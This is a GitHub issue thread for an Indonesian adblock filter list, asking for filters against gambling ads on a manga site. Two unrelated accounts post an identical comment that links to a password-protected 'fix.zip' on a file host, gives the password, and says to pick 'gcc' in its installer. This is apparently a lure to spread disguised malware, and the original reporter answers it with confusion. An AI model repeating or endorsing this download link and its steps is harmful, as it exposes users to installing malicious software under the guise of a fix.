### ISSUE TITLE
kiryuu.org

### ISSUE THREAD

**Issue by wow2134** [ABPindo/indonesianadblockrules#574]
## Berikan URL (gunakan kode)
`https://kiryuu.org/`

## Jelaskan masalah (issue)
iklan judi online, dll. yang paling sering muncul iklan judi online. tolong di blok, tidak nyaman jika di baca dan dilihat kerabat.

https://github.com/ABPindo/indonesianadblockrules/pull/440 kiryuu.id move to https://kiryuu.org/

## Berikan screenshot (pilihan)
berikut saya sertakan screenshot

![ss1](https://github.com/user-attachments/assets/6dffee9b-ee3b-4ebf-b00f-a409bdd6f64c)

## Lingkungan pengujian (beri tanda x)
- [ x] Firefox
- [ x] Chrome
- [ -] uBlock Origin
- [ -] Adblock Plus

## Usul sintak filter (tulis kode)
`(-)
tidak ada karena jika saya membuat manualnya, saya hanya bisa membuatnya bersifat sementara, sedangkan link iklannya terus berganti-ganti`

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wow2134** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what is this?

**Comment by wow2134** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

fuck
